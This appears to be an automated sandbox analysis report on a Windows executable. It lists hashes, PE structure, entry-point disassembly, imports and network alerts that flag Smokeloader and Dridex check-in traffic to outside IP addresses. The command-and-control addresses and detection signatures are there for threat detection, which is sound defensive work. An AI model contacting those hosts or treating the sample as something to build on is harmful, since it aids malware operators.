                                                                                          SHA-256:246EECB0C1FE2EE9526DE2B689D6ED200C1514E3901803E94F41729973B07051
                                                                                          SHA-512:D9C96F92AD7D48CBA22DFFDB48AB0ADBD89DDD5E27415A2C170DA7292159F178A88B19B431A33B1318ABDC751ABCA0F0B9FA2A6C968ED8C29EFEC24098995941
                                                                                          Malicious:false
                                                                                          Preview:.Q.Se.%.."kf..4....'$...5{..|...~..%.Q.K.G..'...{n.sY6.q."..kx..3*..P.4y.QhN.i...l.Ie.....]..f........<..y.pP...._e.T4.5........O.....E..l!..y...-Zo;Q8\....i.`...b\....\..k..+.......=.".....N.]7W..A....H.,.1..+w.......J..........9..3....!....5{%F.)..#i. anV.PxJ.O.Q|...UP^...2h..P6...ILZ.+...u5>+..|...=.@...k.kH..|f_....._+/mK..e...}....x.r.Cafk9.&...6~Y.|...FW){...z..nS..Y.5.UC....$...l..n....M.N..u..0..-h&.?..V9m.....o^?.W......v..........)......R..x...s..1d.......s.p#"..:/Q..@./...X.8..>..N..KO....(...D$..*.%X.-..-.....&..@v..3.6...Z.-.a..p..#Z..W.."..%NOP..EU...$....9"...`..Yp..[...h.u.].(.0.&...g.&s...O|..qD...P.xS..$...5..Ym....^.NB.B.w.a.A&.@.[..@...... D..T..j:...q.....?....H.k....#..:pS..)..A.I!.t.n..9.s.Q.......'.A.f(..>...@..A..Pb.%.R.Cb.1cU:.H#.).)y...xf.....N...T...k.L..kO...-a*.........y.r.w...A...6...*{.3....k.*...U}A...@....~...\..<.4.P$t..w_gr..d..z..=.7F.......<4//s{'i....ew..F .P/..:.3..|....RA..&.'...@.g.D..c..\....8h..{
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):6.916017726971816
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:9VgIkx4su0.exe
                                                                                          File size:396'800 bytes
                                                                                          MD5:5d99d66ef42ec43af05b9304aebefdb6
                                                                                          SHA1:b90f71e96df4a0d654aaab1fdfe2845c8dcb8032
                                                                                          SHA256:4942ff94e613e09ebaada37b5d61a9b08459fcef987303c8dce1fd10868825ac
                                                                                          SHA512:a79ec46d0a34adeac048fe3dff42f60aa08f94ad8ad6862d61c18ddc5a1bcb8b4a2f83f21e41c49d56291b7eb50f6aae1a751dbe8f7d9f1a6fbdbdd02902c7d5
                                                                                          SSDEEP:6144:7IXTv/hzKeX7nJbSN8jMidyytvXOzwgKlbG6yiWTs:ynhzKeLnJbSN8l4cPOzwgKlt1u
                                                                                          TLSH:9684B002D7E3FC50D71A4A31AD6EC6E4A52EFC919E1A635F231C6E2F1A70161C663732
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........L...L...L...#...V...#...j...#.../...E...K...L.......#...M...#...M...#...M...RichL...........................PE..L......e...
                                                                                          Icon Hash:7159452545424443
                                                                                          Entrypoint:0x403b4e
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x65C289DD [Tue Feb 6 19:34:53 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:66c17e6d1b4c7ae7cc41bc6b3ccb8f39
                                                                                          Instruction
                                                                                          call 00007F2D2C911B39h
                                                                                          jmp 00007F2D2C90EA9Eh
                                                                                          push dword ptr [00443FDCh]
                                                                                          call dword ptr [0040E10Ch]
                                                                                          test eax, eax
                                                                                          je 00007F2D2C90EC14h
                                                                                          call eax
                                                                                          push 00000019h
                                                                                          call 00007F2D2C9111D6h
                                                                                          push 00000001h
                                                                                          push 00000000h
                                                                                          call 00007F2D2C90F672h
                                                                                          add esp, 0Ch
                                                                                          jmp 00007F2D2C90F637h
                                                                                          mov edi, edi
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          sub esp, 20h
                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                          push esi
                                                                                          push edi
                                                                                          push 00000008h
                                                                                          pop ecx
                                                                                          mov esi, 0040E3D8h
                                                                                          lea edi, dword ptr [ebp-20h]
                                                                                          rep movsd
                                                                                          mov dword ptr [ebp-08h], eax
                                                                                          mov eax, dword ptr [ebp+0Ch]
                                                                                          pop edi
                                                                                          mov dword ptr [ebp-04h], eax
                                                                                          pop esi
                                                                                          test eax, eax
                                                                                          je 00007F2D2C90EC1Eh
                                                                                          test byte ptr [eax], 00000008h
                                                                                          je 00007F2D2C90EC19h
                                                                                          mov dword ptr [ebp-0Ch], 01994000h
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          push eax
                                                                                          push dword ptr [ebp-10h]
                                                                                          push dword ptr [ebp-1Ch]
                                                                                          push dword ptr [ebp-20h]
                                                                                          call dword ptr [0040E078h]
                                                                                          leave
                                                                                          retn 0008h
                                                                                          mov edi, edi
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push ecx
                                                                                          push ebx
                                                                                          mov eax, dword ptr [ebp+0Ch]
                                                                                          add eax, 0Ch
                                                                                          mov dword ptr [ebp-04h], eax
                                                                                          mov ebx, dword ptr fs:[00000000h]
                                                                                          mov eax, dword ptr [ebx]
                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                          mov ebx, dword ptr [ebp+0Ch]
                                                                                          mov ebp, dword ptr [ebp-04h]
                                                                                          mov esp, dword ptr [ebx-04h]
                                                                                          jmp eax
                                                                                          pop ebx
                                                                                          leave
                                                                                          retn 0008h
                                                                                          pop eax
                                                                                          pop ecx
                                                                                          xchg dword ptr [esp], eax
                                                                                          jmp eax
                                                                                          pop eax
                                                                                          pop ecx
                                                                                          xchg dword ptr [esp], eax
                                                                                          jmp eax
                                                                                          pop eax
                                                                                          pop ecx
                                                                                          xchg dword ptr [esp], eax
                                                                                          jmp eax
                                                                                          Programming Language:
                                                                                          • [ASM] VS2010 build 30319
                                                                                          • [C++] VS2010 build 30319
                                                                                          • [ C ] VS2010 build 30319
                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                          • [RES] VS2010 build 30319
                                                                                          • [LNK] VS2010 build 30319
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3c6080x50.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000x1ef88.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3c6580x1c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3bcc00x40.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xe0000x1c8.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000xc8ed0xca00448568e573790193111d5836ce2e88dbFalse0.6057394801980198data6.70667131185134IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0xe0000x2f06c0x2f200692e1764b69344706a562cb9ecfe0d80False0.9449912964190982data7.893960962427734IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x3e0000x10a280x5e00237f27a21769cff03c9471609aef50c0False0.0848154920212766data1.0939664917011824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0x4f0000x1ef880x1f000677e6b1aaeff42ab64376d95443181b6False0.4263797883064516data5.066359201072415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_CURSOR0x68b380x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                                          RT_CURSOR0x68c680xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                                          RT_CURSOR0x68d400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                                          RT_CURSOR0x69be80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                                          RT_CURSOR0x6a4900x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                                          RT_CURSOR0x6aa280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                                          RT_CURSOR0x6b8d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                                          RT_CURSOR0x6c1780x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                                          RT_ICON0x4fa800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.43256929637526653
                                                                                          RT_ICON0x4fa800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.43256929637526653
                                                                                          RT_ICON0x509280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5555054151624549
                                                                                          RT_ICON0x509280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5555054151624549
                                                                                          RT_ICON0x511d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.586405529953917
                                                                                          RT_ICON0x511d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.586405529953917
                                                                                          RT_ICON0x518980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6098265895953757
                                                                                          RT_ICON0x518980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6098265895953757
                                                                                          RT_ICON0x51e000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4473029045643154
                                                                                          RT_ICON0x51e000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4473029045643154
                                                                                          RT_ICON0x543a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4941369606003752
                                                                                          RT_ICON0x543a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4941369606003752
                                                                                          RT_ICON0x554500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.5212765957446809
                                                                                          RT_ICON0x554500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.5212765957446809
                                                                                          RT_ICON0x559200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3805970149253731
                                                                                          RT_ICON0x559200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3805970149253731
                                                                                          RT_ICON0x567c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5090252707581228
                                                                                          RT_ICON0x567c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5090252707581228
                                                                                          RT_ICON0x570700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5702764976958525
                                                                                          RT_ICON0x570700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5702764976958525
                                                                                          RT_ICON0x577380x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.5845375722543352
                                                                                          RT_ICON0x577380x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.5845375722543352
                                                                                          RT_ICON0x57ca00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.3744813278008299
                                                                                          RT_ICON0x57ca00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.3744813278008299
                                                                                          RT_ICON0x5a2480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4129924953095685
                                                                                          RT_ICON0x5a2480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4129924953095685
                                                                                          RT_ICON0x5b2f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4077868852459016
                                                                                          RT_ICON0x5b2f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4077868852459016
                                                                                          RT_ICON0x5bc780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.47429078014184395
                                                                                          RT_ICON0x5bc780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.47429078014184395
                                                                                          RT_ICON0x5c1580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.4936034115138593
                                                                                          RT_ICON0x5c1580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.4936034115138593
                                                                                          RT_ICON0x5d0000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.46705776173285196
                                                                                          RT_ICON0x5d0000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.46705776173285196
                                                                                          RT_ICON0x5d8a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4342485549132948
                                                                                          RT_ICON0x5d8a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4342485549132948
                                                                                          RT_ICON0x5de100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.27852697095435686
                                                                                          RT_ICON0x5de100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.27852697095435686
                                                                                          RT_ICON0x603b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2861163227016886
                                                                                          RT_ICON0x603b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2861163227016886
                                                                                          RT_ICON0x614600x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3081967213114754
                                                                                          RT_ICON0x614600x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3081967213114754
                                                                                          RT_ICON0x61de80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3333333333333333
                                                                                          RT_ICON0x61de80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3333333333333333
                                                                                          RT_ICON0x622b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3763326226012793
                                                                                          RT_ICON0x622b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3763326226012793
                                                                                          RT_ICON0x631600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5243682310469314
                                                                                          RT_ICON0x631600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5243682310469314
                                                                                          RT_ICON0x63a080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6082949308755761
                                                                                          RT_ICON0x63a080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6082949308755761
                                                                                          RT_ICON0x640d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6676300578034682
                                                                                          RT_ICON0x640d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6676300578034682
                                                                                          RT_ICON0x646380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.49263485477178426
                                                                                          RT_ICON0x646380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.49263485477178426
                                                                                          RT_ICON0x66be00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.5119606003752345
                                                                                          RT_ICON0x66be00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.5119606003752345
                                                                                          RT_ICON0x67c880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.49221311475409835
                                                                                          RT_ICON0x67c880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.49221311475409835
                                                                                          RT_ICON0x686100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.5460992907801419
                                                                                          RT_ICON0x686100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.5460992907801419
                                                                                          RT_STRING0x6c9700x35edataTamilIndia0.46867749419953597
                                                                                          RT_STRING0x6c9700x35edataTamilSri Lanka0.46867749419953597
                                                                                          RT_STRING0x6ccd00x5e8dataTamilIndia0.4398148148148148
                                                                                          RT_STRING0x6ccd00x5e8dataTamilSri Lanka0.4398148148148148
                                                                                          RT_STRING0x6d2b80x27edataTamilIndia0.48119122257053293
                                                                                          RT_STRING0x6d2b80x27edataTamilSri Lanka0.48119122257053293
                                                                                          RT_STRING0x6d5380x6eedataTamilIndia0.4295377677564825
                                                                                          RT_STRING0x6d5380x6eedataTamilSri Lanka0.4295377677564825
                                                                                          RT_STRING0x6dc280x35edataTamilIndia0.4605568445475638
                                                                                          RT_STRING0x6dc280x35edataTamilSri Lanka0.4605568445475638
                                                                                          RT_ACCELERATOR0x68af00x48dataTamilIndia0.8472222222222222
                                                                                          RT_ACCELERATOR0x68af00x48dataTamilSri Lanka0.8472222222222222
                                                                                          RT_GROUP_CURSOR0x68d180x22data1.0588235294117647
                                                                                          RT_GROUP_CURSOR0x6a9f80x30data0.9375
                                                                                          RT_GROUP_CURSOR0x6c6e00x30data0.9375
                                                                                          RT_GROUP_ICON0x558b80x68dataTamilIndia0.6826923076923077
                                                                                          RT_GROUP_ICON0x558b80x68dataTamilSri Lanka0.6826923076923077
                                                                                          RT_GROUP_ICON0x5c0e00x76dataTamilIndia0.6779661016949152
                                                                                          RT_GROUP_ICON0x5c0e00x76dataTamilSri Lanka0.6779661016949152
                                                                                          RT_GROUP_ICON0x68a780x76dataTamilIndia0.6779661016949152
                                                                                          RT_GROUP_ICON0x68a780x76dataTamilSri Lanka0.6779661016949152
                                                                                          RT_GROUP_ICON0x622500x68dataTamilIndia0.7115384615384616
                                                                                          RT_GROUP_ICON0x622500x68dataTamilSri Lanka0.7115384615384616
                                                                                          RT_VERSION0x6c7100x25cdata0.5413907284768212
                                                                                          DLLImport
                                                                                          KERNEL32.dllInterlockedIncrement, InterlockedDecrement, SetEnvironmentVariableW, CreateJobObjectW, InterlockedCompareExchange, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, CreateHardLinkA, _lcreat, GetTickCount, LocalFlags, SetFileTime, ClearCommBreak, TlsSetValue, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesW, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, RaiseException, GetShortPathNameA, LCMapStringA, VerifyVersionInfoW, GetConsoleAliasExesA, GetLogicalDriveStringsA, GetLastError, GetProcAddress, CreateNamedPipeA, EnumSystemCodePagesW, SetComputerNameA, GlobalFree, LoadLibraryA, LocalAlloc, SetCalendarInfoW, GetNumberFormatW, CreateEventW, OpenEventA, QueryDosDeviceW, FoldStringW, GlobalWire, GetCurrentDirectoryA, EnumDateFormatsW, GetShortPathNameW, SetProcessShutdownParameters, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, SetFileAttributesW, CommConfigDialogW, GetLocaleInfoA, SetFilePointer, GetStdHandle, EnumCalendarInfoA, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RtlUnwind, HeapAlloc, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, HeapSize, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW
                                                                                          GDI32.dllCreateDCW, GetCharWidth32A, GetCharWidthI
                                                                                          WINHTTP.dllWinHttpOpen
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          TamilIndia
                                                                                          TamilSri Lanka
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-10-03T23:27:26.351046+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549755190.224.203.3780TCP
                                                                                          2024-10-03T23:27:27.758377+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549765190.224.203.3780TCP
                                                                                          2024-10-03T23:27:29.194284+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549776190.224.203.3780TCP
                                                                                          2024-10-03T23:27:30.544106+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549787190.224.203.3780TCP
                                                                                          2024-10-03T23:27:31.904800+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549798190.224.203.3780TCP
                                                                                          2024-10-03T23:27:33.286503+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549807190.224.203.3780TCP
                                                                                          2024-10-03T23:27:34.676196+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549815190.224.203.3780TCP
                                                                                          2024-10-03T23:27:36.198420+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549826190.224.203.3780TCP
                                                                                          2024-10-03T23:27:37.768833+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549836190.224.203.3780TCP
                                                                                          2024-10-03T23:27:39.169274+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549847190.224.203.3780TCP
                                                                                          2024-10-03T23:27:40.555439+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549857190.224.203.3780TCP
                                                                                          2024-10-03T23:27:42.030471+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549866190.224.203.3780TCP
                                                                                          2024-10-03T23:27:43.407680+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549875190.224.203.3780TCP
                                                                                          2024-10-03T23:27:44.841740+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549886190.224.203.3780TCP
                                                                                          2024-10-03T23:27:46.506715+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549896190.224.203.3780TCP
                                                                                          2024-10-03T23:27:47.946560+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549905190.224.203.3780TCP
                                                                                          2024-10-03T23:27:49.341855+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549915190.224.203.3780TCP
                                                                                          2024-10-03T23:27:50.755886+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549925190.224.203.3780TCP
                                                                                          2024-10-03T23:27:52.931239+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549933190.224.203.3780TCP
                                                                                          2024-10-03T23:27:54.628396+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549943190.224.203.3780TCP
                                                                                          2024-10-03T23:27:56.024081+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549955190.224.203.3780TCP
                                                                                          2024-10-03T23:27:57.416962+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549962190.224.203.3780TCP
                                                                                          2024-10-03T23:27:58.838657+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549973190.224.203.3780TCP
                                                                                          2024-10-03T23:28:00.557599+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549983190.224.203.3780TCP
                                                                                          2024-10-03T23:28:01.964076+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549995190.224.203.3780TCP
                                                                                          2024-10-03T23:28:04.724708+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550001190.224.203.3780TCP
                                                                                          2024-10-03T23:28:06.106668+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550002190.224.203.3780TCP
                                                                                          2024-10-03T23:28:07.783475+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550003190.224.203.3780TCP
                                                                                          2024-10-03T23:28:27.492822+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000423.145.40.162443TCP
                                                                                          2024-10-03T23:28:27.815568+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55000423.145.40.162443TCP
                                                                                          2024-10-03T23:28:27.911603+02002829848ETPRO MALWARE SmokeLoader encrypted module (3)223.145.40.162443192.168.2.550004TCP
                                                                                          2024-10-03T23:28:28.827338+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000523.145.40.162443TCP
                                                                                          2024-10-03T23:28:29.109018+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55000523.145.40.162443TCP
                                                                                          2024-10-03T23:28:29.698649+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000623.145.40.162443TCP
                                                                                          2024-10-03T23:28:29.972457+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55000623.145.40.162443TCP
                                                                                          2024-10-03T23:28:30.593972+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000723.145.40.162443TCP
                                                                                          2024-10-03T23:28:30.878819+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55000723.145.40.162443TCP
                                                                                          2024-10-03T23:28:31.491717+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000823.145.40.162443TCP
                                                                                          2024-10-03T23:28:31.769891+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55000823.145.40.162443TCP
                                                                                          2024-10-03T23:28:32.397820+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55000923.145.40.162443TCP
                                                                                          2024-10-03T23:28:32.676674+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55000923.145.40.162443TCP
                                                                                          2024-10-03T23:28:33.281763+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001023.145.40.162443TCP
                                                                                          2024-10-03T23:28:33.562551+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55001023.145.40.162443TCP
                                                                                          2024-10-03T23:28:34.158137+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001123.145.40.162443TCP
                                                                                          2024-10-03T23:28:34.427119+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55001123.145.40.162443TCP
                                                                                          2024-10-03T23:28:35.523365+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001223.145.40.162443TCP
                                                                                          2024-10-03T23:28:35.807317+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55001223.145.40.162443TCP
                                                                                          2024-10-03T23:28:36.427500+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001323.145.40.162443TCP
                                                                                          2024-10-03T23:28:36.718130+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55001323.145.40.162443TCP
                                                                                          2024-10-03T23:28:37.346496+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001423.145.40.162443TCP
                                                                                          2024-10-03T23:28:37.626997+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55001423.145.40.162443TCP
                                                                                          2024-10-03T23:28:38.252554+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001523.145.40.162443TCP
                                                                                          2024-10-03T23:28:38.530680+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.55001523.145.40.162443TCP
                                                                                          2024-10-03T23:28:39.245617+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.55001623.145.40.162443TCP
